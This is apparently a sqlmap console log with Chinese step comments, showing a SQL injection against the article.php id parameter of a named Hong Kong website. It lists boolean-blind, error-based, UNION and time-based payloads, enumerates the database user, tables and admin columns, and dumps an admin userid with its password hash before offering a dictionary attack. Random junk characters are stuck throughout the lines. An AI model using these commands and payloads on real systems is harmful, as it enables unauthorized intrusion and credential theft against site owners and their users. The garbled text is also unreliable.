D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
1 x) M& @. y! e5 n+ K; Q1 Tms "Mysql" --current-user /* 注解:获取当前用户名称! q7 |! c0 D0 X+ m0 z- c" E
sqlmap/0.9 - automatic SQL injection and database takeover tool0 ? s3 G4 G* e- u
http://sqlmap.sourceforge.net starting at: 16:53:54! s# r, {9 Y- e* B2 e J+ n
[16:53:54] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
% n9 M0 [+ l6 N, r session file
7 R# e9 S, N; E/ d! b8 q[16:53:54] [INFO] resuming injection data from session file
1 ?/ p# u, \. N1 b e$ v$ E L[16:53:54] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
: u: l3 M" k2 k[16:53:54] [INFO] testing connection to the target url: \7 z, `6 X- C+ ?4 U
sqlmap identified the following injection points with a total of 0 HTTP(s) reque4 Q1 F* T6 V& K) s! k5 s0 k$ i Z; _
sts:! O. D8 e8 q' ?# k/ V0 b; O
---/ g. I9 ^( A. l7 Q
Place: GET
2 C# d; A" I* u7 `1 EParameter: id
2 t7 _ r0 ?! b2 e9 o Type: boolean-based blind
/ G- T( u5 A( q* S4 F' D Title: AND boolean-based blind - WHERE or HAVING clause
) z* `' i6 y9 X) G; h Payload: id=276 AND 799=7998 y% Z; I3 ~. N( [
Type: error-based
6 }9 q0 R, a- i9 ]9 l Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause: g% O* F; ] B# Z
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
; V, h% u0 p% ^7 o6 g120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58( S) B H1 w! x! w$ U+ l, r" H6 u: j
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)# k R7 f* g% C# n8 N3 f2 E
Type: UNION query s9 _% s; G' Y$ y( W
Title: MySQL UNION query (NULL) - 1 to 10 columns
) u8 B2 F. c+ x; L; f6 u. C/ _ Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
7 P" B7 T! {9 L( u! ~5 C(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
# d4 R+ C, P% M( O/ MCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#+ E9 [ a9 {6 J+ b6 g
Type: AND/OR time-based blind
5 P2 P% c8 Y3 _! u# g( b7 Q Title: MySQL > 5.0.11 AND time-based blind
( G9 w. }4 Y2 Q' p! l: D Payload: id=276 AND SLEEP(5)/ ]' N5 p# l. z6 |
---
5 U. e! K$ Q/ M! k h[16:53:55] [INFO] the back-end DBMS is MySQL0 T& q! K) ^* h# D
web server operating system: Windows8 i {/ f5 x4 o0 ]4 ^
web application technology: Apache 2.2.11, PHP 5.3.0" x7 L/ z0 f" c7 Q; j! `; ]
back-end DBMS: MySQL 5.07 k* F9 W5 d( V1 l9 K8 q" h
[16:53:55] [INFO] fetching current user
/ R' R# Z+ d/ \9 E: F' r1 icurrent user: 'root@localhost' % T7 R; z/ O) W& ~0 W! j
[16:53:58] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
" \, `# Z7 c/ [6 f- ?tput\www.wepost.com.hk' shutting down at: 16:53:58
8 J9 V* d6 h( A
! g, ]* V5 b% s v, ^# ?5 t, K/ MD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db7 U. u4 m$ q; I% e. c0 O, p
ms "Mysql" --current-db /*当前数据库
- q, N$ F, l% H& w! v' b" f/ o" o sqlmap/0.9 - automatic SQL injection and database takeover tool5 x, L) y+ a2 s# e
http://sqlmap.sourceforge.net starting at: 16:54:16
+ `3 ]4 w6 O7 `7 k: g: I) w[16:54:16] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as6 f: r1 Z S [4 Q( F7 g0 M3 i
session file6 S; {4 e$ T: `
[16:54:16] [INFO] resuming injection data from session file
% E; E: N8 ]! |0 o2 T: [+ L" g[16:54:16] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
6 I( S" R. ~. c; `[16:54:16] [INFO] testing connection to the target url
, t. f+ R& A, S9 O/ T1 Z! X! j% isqlmap identified the following injection points with a total of 0 HTTP(s) reque" l+ O* M C9 {# H0 K5 |" k" }
sts:7 a5 T( L1 k! ^3 z2 y' ~. Q% ~* B
---2 _1 p8 G( J7 ^& u
Place: GET. w" t% M0 Z* P2 A7 [
Parameter: id# |; B- x' U7 [ v! V$ K. i1 N
Type: boolean-based blind* l- s6 D8 z8 a$ t
Title: AND boolean-based blind - WHERE or HAVING clause
! J3 W9 R$ B" j& z" m/ @ Payload: id=276 AND 799=799% \' W0 W: J! ]1 T6 }' C: x
Type: error-based% _5 T) V6 O. n$ r! ]7 n' x- f- G
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
W l' s* ?; Y- i3 x* d Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,
' }8 ~1 u& o8 ^5 T120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
; u2 }% q; C2 D0 s1 W. \# j),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a). x, `+ O& A! Y% D" B& D
Type: UNION query& m- r5 m E! P; s3 |* f% [
Title: MySQL UNION query (NULL) - 1 to 10 columns
% N# D3 W3 z% I$ o! N& ? Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR: o2 N2 o' c: I# } ^
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
% t" Y- K4 N# O/ M% GCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
% S" a2 {4 ~( i Type: AND/OR time-based blind
4 T) L: B/ G9 A0 _, ?5 o Title: MySQL > 5.0.11 AND time-based blind
3 @6 v( H! w0 q# A2 l: [/ M Payload: id=276 AND SLEEP(5)
' x& S7 p, ] \& e: w7 g; }---
1 @" X7 I2 ^2 u* h! [8 ][16:54:17] [INFO] the back-end DBMS is MySQL
R0 [! m# q9 R& h/ Iweb server operating system: Windows
0 }9 m% @7 z0 C- N) l3 W" Kweb application technology: Apache 2.2.11, PHP 5.3.0
3 m8 O; v' ?3 D& [% uback-end DBMS: MySQL 5.0, Z9 G& W8 I7 B. Z1 z, u
[16:54:17] [INFO] fetching current database
3 K3 {% c$ y5 ?, kcurrent database: 'wepost'3 m% r* p5 M; W2 a% u
[16:54:18] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
3 T6 F' Q4 F5 u4 o. Qtput\www.wepost.com.hk' shutting down at: 16:54:18; `7 ] ]2 {5 ]0 |) [6 s
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
- K& R- B) @( _; V2 c3 Q! x: Wms "Mysql" --tables -D "wepost" /*获取当前数据库的表名4 X' }/ X5 |% y( I. c
sqlmap/0.9 - automatic SQL injection and database takeover tool
: |8 a) R# S, h8 |" w; p- { http://sqlmap.sourceforge.net starting at: 16:55:25* }" w4 k% l3 p2 E- \' G
[16:55:25] [INFO] using 'D:\Python27\sqlmap\output\www.wepost.com.hk\session' as
5 n5 v; `- v2 O/ o- J8 a session file' r& S' x# k, ~4 E
[16:55:25] [INFO] resuming injection data from session file4 m, ]2 W3 T2 N
[16:55:25] [INFO] resuming back-end DBMS 'mysql 5.0' from session file( C8 y4 ^* _6 U
[16:55:25] [INFO] testing connection to the target url
! Q, K+ B& f6 ?- Gsqlmap identified the following injection points with a total of 0 HTTP(s) reque
$ ]# M2 }' P1 j. ^7 Qsts:
. Z" M, O3 L7 r, h G" M2 p---0 a, B# @+ ?* {6 F
Place: GET9 Q: X: y" p: h- C5 \, Z' h; A2 P
Parameter: id0 v- _$ w& T% z& j7 V& x, _
Type: boolean-based blind
0 H5 }9 a: h' q! N0 m! i Title: AND boolean-based blind - WHERE or HAVING clause
1 \4 B0 C. x2 t4 n Payload: id=276 AND 799=799
( c% S& |$ ]/ v5 k) u7 C Type: error-based% Q& c5 D/ s/ f$ X/ q0 t
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
1 z/ p8 u4 A) j8 t, A$ F Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,% O1 k6 T" |! B' h5 d/ {
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
: m& {( k- F$ P$ i1 l# U4 c- Z),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)" q. X/ e( n3 e: Q4 l
Type: UNION query
+ \7 Q9 f( g3 {5 d3 T Title: MySQL UNION query (NULL) - 1 to 10 columns
$ F! p) Y9 ^2 t6 g9 { Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
5 I" W6 a+ b. n" _3 D7 h, P4 z6 |(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 ?! {& `# F( R( Z+ t
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#7 R" H0 ^* z' E4 q
Type: AND/OR time-based blind
( p6 T8 @/ A* V) k! e" a! s Title: MySQL > 5.0.11 AND time-based blind
* h3 M" F. M6 z9 J/ r Payload: id=276 AND SLEEP(5)
6 @/ a5 z! W& n6 Z---4 T, n; @8 c0 C- {. g% O
[16:55:26] [INFO] the back-end DBMS is MySQL
. d" { ]' ?% T. e% X' g# lweb server operating system: Windows$ o/ h$ m0 H6 e" N: Z+ x
web application technology: Apache 2.2.11, PHP 5.3.0
+ A {: f+ L2 ^* ~. sback-end DBMS: MySQL 5.0
( {* z' ~4 ~) B9 x- U: Q3 ~- A$ \[16:55:26] [INFO] fetching tables for database 'wepost'8 x5 n* {; [. O! |
[16:55:27] [INFO] the SQL query used returns 6 entries+ B$ x) J3 K% h
Database: wepost
- ~* Z3 l) ^$ b0 X+ {* X$ d% R: @3 ][6 tables]* n7 Y+ l- c1 s( G' s. ~
+-------------+4 r' p/ q/ Y) F
| admin |
( T \4 q. y* Q| article |
7 t# O4 l9 a$ T6 R+ O# \| contributor |
" \/ H: H2 v8 o+ n| idea |
& J7 t) b$ a, v7 m& q| image |# R# b! N% |5 @- ^; B9 {& ^6 T" N
| issue |6 A8 [! i) R0 }; y4 @4 E
+-------------+" }/ P) q2 [2 r0 U; ^
[16:55:33] [INFO] Fetched data logged to text files under 'D:\Python27\sqlmap\ou
% ?% b6 y/ q; F( d& Ctput\www.wepost.com.hk' shutting down at: 16:55:333 ]5 i# L: N1 Y2 i
& l0 q' [! b! o6 h7 x5 xD:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db
: p% G- K6 g/ y6 C, [ms "Mysql" --columns -T "admin" users-D "wepost" -v 0 /*获取admin表的字段名+ H( G/ a, \+ C
sqlmap/0.9 - automatic SQL injection and database takeover tool1 r+ O Y8 I3 t u4 D
http://sqlmap.sourceforge.net starting at: 16:56:06
; Z' J9 S2 o$ |/ F7 l7 psqlmap identified the following injection points with a total of 0 HTTP(s) reque& b# C! G: |, K; U- o- |* D$ `
sts:
s8 D0 k, O" |% q) T5 N---
) O' I, _' a+ H, Y$ ePlace: GET! c5 c7 `1 [* e' b' }: m# ?+ v
Parameter: id6 n4 U& D4 i8 N4 E% L) P
Type: boolean-based blind1 t- H. Q2 l) B" a7 P1 g" X2 J" V
Title: AND boolean-based blind - WHERE or HAVING clause u7 f% l% c' ?: t" ]
Payload: id=276 AND 799=799% a O }* S6 ] j3 p4 i2 \
Type: error-based
+ x M8 k* h! i Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause- l* F% u. ~. X+ o. r! r( C3 G
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,7 Q' p. O' b& o4 }, x, Q; p) J
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58
- F* `, y" ^/ m1 f),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
/ N2 f/ c8 j/ I; G Type: UNION query
# t1 i" ]8 C2 J P% }/ J9 O N. F Title: MySQL UNION query (NULL) - 1 to 10 columns4 ]0 v3 i/ J) Z4 m k5 c0 O. p
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR
. t! ?7 h+ G/ ?(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),5 a* E+ h% w7 g+ i
CHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#
; x* A0 h3 j& n% Q# G) e Type: AND/OR time-based blind% v8 q& t4 |4 X
Title: MySQL > 5.0.11 AND time-based blind$ f5 T, l. t7 |: u" p. l& n' S
Payload: id=276 AND SLEEP(5)
2 C+ g6 W, A* ` P+ N/ F5 C---
R0 u; ^' x0 E9 W# v2 g1 _web server operating system: Windows
y% G. T7 E; d1 sweb application technology: Apache 2.2.11, PHP 5.3.0
) v% `4 e8 m# H# Q* G; ^back-end DBMS: MySQL 5.0
L/ [6 s! P7 x! S( l1 B/ B# |[16:56:11] [INFO] read from file 'D:\Python27\sqlmap\output\www.wepost.com.hk\se
; i8 J. s/ K w2 D2 \$ ?ssion': wepost, wepost; S7 f( r/ R' J, Y: B7 c, K6 G4 ~ \* r
Database: wepost
A* B( ~" t$ [( Z1 c+ o& {3 VTable: admin1 e3 j$ j6 {4 X: R3 C( @/ {/ |& B p
[4 columns]6 X; N& x, U/ s! _. V' t$ D/ A& X
+----------+-------------+
( w+ a2 _# W o' O+ e7 g, b| Column | Type |
9 x- Y, S" ?! I3 I+----------+-------------+( z$ g6 R: Z% e* v+ A/ J
| id | int(11) |/ R1 B1 J' d$ L8 R
| password | varchar(32) |
7 X4 E* S& A! H2 q6 || type | varchar(10) |
% F4 I R, G$ @# x' K4 r0 i9 f8 Z| userid | varchar(20) |
' I* ?" [9 e$ r6 }! b5 J+----------+-------------+
. P8 k J( T5 F/ J# o& l0 v shutting down at: 16:56:19
$ a: f9 v/ L# ]9 z, e5 j! ]; f H8 t+ Q! o( X4 R
D:\Python27\sqlmap>sqlmap.py -u http://www.wepost.com.hk/article.php?id=276 --db( @/ G9 y* h" y5 l8 T' f
ms "Mysql" --dump -C "userid,password" -T "admin" -D "wepost" -v 0 /*获取字段里面的内容
k, h F( `% ?- k2 b$ r) `) U0 G sqlmap/0.9 - automatic SQL injection and database takeover tool
5 T, ?: ?+ E+ w2 x) Y/ ~8 U% a http://sqlmap.sourceforge.net starting at: 16:57:14
0 }! J! L+ Q! rsqlmap identified the following injection points with a total of 0 HTTP(s) reque$ K5 j$ C1 `1 o' S( u r
sts:6 b. r3 V+ d2 z; ^7 _* V- y$ |* k, V
---0 w, s8 Y% S4 ^1 _# U( Z1 c4 q% @1 b
Place: GET
4 [5 u+ \6 O! \7 l. @8 V! \Parameter: id
9 D! O" z, a$ [7 x Type: boolean-based blind9 d# z. e4 K: y: f3 A8 Z. H5 O
Title: AND boolean-based blind - WHERE or HAVING clause
2 Z; M) R( J0 u; W* a Payload: id=276 AND 799=799
$ m5 Q( }5 h8 y: Y) w& M+ D Type: error-based
7 Q6 e- Z" K/ I' _1 b2 N$ f# ^ Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause) ^! N4 @; i' Q" f r0 D
Payload: id=276 AND (SELECT 8404 FROM(SELECT COUNT(*),CONCAT(CHAR(58,99,118,; o) Q* X) q0 K3 i" Y
120,58),(SELECT (CASE WHEN (8404=8404) THEN 1 ELSE 0 END)),CHAR(58,110,99,118,58$ n0 y! X3 W2 ?+ I4 L- r+ w. o
),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)4 Q+ C6 z/ b) H# H* F0 L
Type: UNION query, L0 h: e, ~) E6 y) p
Title: MySQL UNION query (NULL) - 1 to 10 columns3 l# n- c2 r+ W/ x' ]
Payload: id=-8474 UNION ALL SELECT NULL, NULL, NULL, NULL, NULL, CONCAT(CHAR3 u p& e4 `) ]2 `) K7 b# U+ N
(58,99,118,120,58),IFNULL(CAST(CHAR(79,76,101,85,86,105,101,89,109,65) AS CHAR),
5 F' m- s7 U& n3 J4 g8 z3 K; v6 L' RCHAR(32)),CHAR(58,110,99,118,58)), NULL, NULL, NULL#6 ?, n4 Z: S6 E- U6 q2 ~" b3 {, o; |
Type: AND/OR time-based blind+ i+ V) P' @ n2 x
Title: MySQL > 5.0.11 AND time-based blind5 S6 X t4 W9 ~0 t1 H% E
Payload: id=276 AND SLEEP(5). \1 |! K9 h" [- t
---. S) y2 I. U+ V; V- h
web server operating system: Windows
$ u. E' p a! o. D; qweb application technology: Apache 2.2.11, PHP 5.3.0# d( J0 L0 d$ C
back-end DBMS: MySQL 5.01 V2 Z9 [0 H1 u: U0 P1 r- k! T/ S
recognized possible password hash values. do you want to use dictionary attack o. y/ o0 ?3 Z! g1 b7 Q; a" K
n retrieved table items? [Y/n/q] y
$ l6 X# d$ H9 _( ywhat's the dictionary's location? [D:\Python27\sqlmap\txt\wordlist.txt]
- l \! e3 }$ p" k) |do you want to use common password suffixes? (slow!) [y/N] y# D5 _% O) c) C0 B
Database: wepost
. S- e5 h4 \9 }0 lTable: admin
* y- \; d! r9 f( y! a[1 entry]$ d g% z* w# W: c
+----------------------------------+------------+( S$ f6 y7 b, G& V8 _/ \
| password | userid |8 C8 K; U% a% }+ k; F4 n
+----------------------------------+------------+
3 g6 Y& {: w( e0 c7 Q| 7d4d7589db8b28e04db0982dd0e92189 | wepost2010 |
8 p, O' q/ ^) W, Z+----------------------------------+------------+/ j6 G4 \3 N" ]7 Z
shutting down at: 16:58:14- V+ |( S6 V; [( [0 t0 [
0 A7 Y: ]8 \5 e. B7 }. ^D:\Python27\sqlmap> |